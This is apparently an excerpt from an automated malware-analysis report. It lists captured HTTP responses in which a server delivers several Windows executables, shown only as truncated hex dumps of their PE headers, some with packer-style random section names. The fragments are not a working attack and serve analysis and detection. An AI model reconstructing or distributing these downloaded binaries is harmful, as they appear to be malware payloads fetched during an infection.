00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4b 00 00 04 00 00 4a 61 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 06 00 6a 00 00 00 00 60 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 3b 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 3b 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 62 75 70 79 62 6b 65 00 00 1a 00 00 40 31 00 00 fe 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6a 78 71 61 69 64 73 00 10 00 00 00 40 4b 00 00 06 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4b 00 00 22 00 00 00 f0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:12 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Fri, 19 Apr 2024 00:36:20 GMTConnection: keep-aliveETag: "6621bc84-11cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 bc 21 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 94 fe 11 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:16 GMTContent-Type: application/octet-streamContent-Length: 2295808Last-Modified: Fri, 19 Apr 2024 00:36:37 GMTConnection: keep-aliveETag: "6621bc95-230800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 32 04 00 00 00 00 00 00 10 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 58 00 00 04 00 00 0a 19 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 54 4d 57 00 4c 00 00 00 6d 10 15 00 95 00 00 00 00 50 14 00 ec b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 4d 57 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 4c 57 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ec b5 00 00 00 50 14 00 00 82 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 20 15 00 00 02 00 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6a 77 79 65 79 6e 69 00 40 19 00 00 d0 3e 00 00 32 19 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 65 75 71 78 77 62 00 10 00 00 00 10 58 00 00 02 00 00 00 06 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:22 GMTContent-Type: application/octet-streamContent-Length: 2310656Last-Modified: Fri, 19 Apr 2024 00:36:46 GMTConnection: keep-aliveETag: "6621bc9e-234200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 48 04 00 00 00 00 00 00 00 59 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 59 00 00 04 00 00 a3 8c 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 cc 4a 58 00 4c 00 00 00 5e 10 15 00 72 00 00 00 00 50 14 00 f8 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 4a 58 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 4a 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f8 b2 00 00 00 50 14 00 00 80 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 ce 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 20 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 61 76 6e 65 79 71 71 00 70 19 00 00 90 3f 00 00 6c 19 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 78 63 77 7a 66 70 63 00 10 00 00 00 00 59 00 00 04 00 00 00 3e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Thu, 01 Feb 2024 16:00:36 GMTConnection: keep-aliveETag: "65bbc024-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 0f bf bb 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 97792Last-Modified: Fri, 19 Apr 2024 00:20:52 GMTConnection: keep-aliveETag: "6621b8e4-17e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 4e 93 01 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 93 01 00 4b 00 00 00 00 a0 01 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 73 01 00 00 20 00 00 00 74 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 de 04 00 00 00 a0 01 00 00 06 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 93 01 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 af 00 00 4c e3 00 00 03 00 00 00 43 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 09 00 20 03 00 00 01 00 00 11 73 01 00 00 0a 0a 02 7e 03 00 00 04 25 2d 17 26 7e 02 00 00 04 fe 06 10 00 00 06 73 02 00 00 0a 25 80 03 00 00 04 28 01 00 00 2b 6f 04 00 00 0a 0b 38 cc 02 00 00 07 6f 05 00 00 0a 17 17 19 8d 08 00 00 01 25 16 1f 0a 8d 09 00 00 01 25 d0 0a 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 17 1e 8d 09 00 00 01 25 d0 02 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 18 1d 8d 09 00 00 01 25 d0 07 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 28 01 01 00 06 6f 08 00 00 0a 0c 38 46 02 00 00 12 02 28 09 00 00 0a 0d 73 09 00 00 06 13 04 73 2c 01 00 06 13 05 11 04 7e 0a 00 00 0a 7d 01 00 00 04 7e 0a 00 00 0a 13 06 11 04 09 73 0b 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 7d 01 00 00 04 11 04 7b 01 00 00 04 1f 0f 8d 09 00 00 01 25 d0 12 01 00 04 28 06 00 00 0a 73 07 00 00 0a 6f 0e 00 00 0a 2c 1a 1e 8d 09 00 00 01 25 d0 fd 00 00 04 28 06 00 00 0a 73 07 00 00 0a 13 06 2b 4f 09 1f 3e 8d 09 00 00 01 25 d0 ca 00 00 04 28 06 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:07 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Thu, 01 Feb 2024 16:00:35 GMTConnection: keep-aliveETag: "65bbc023-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 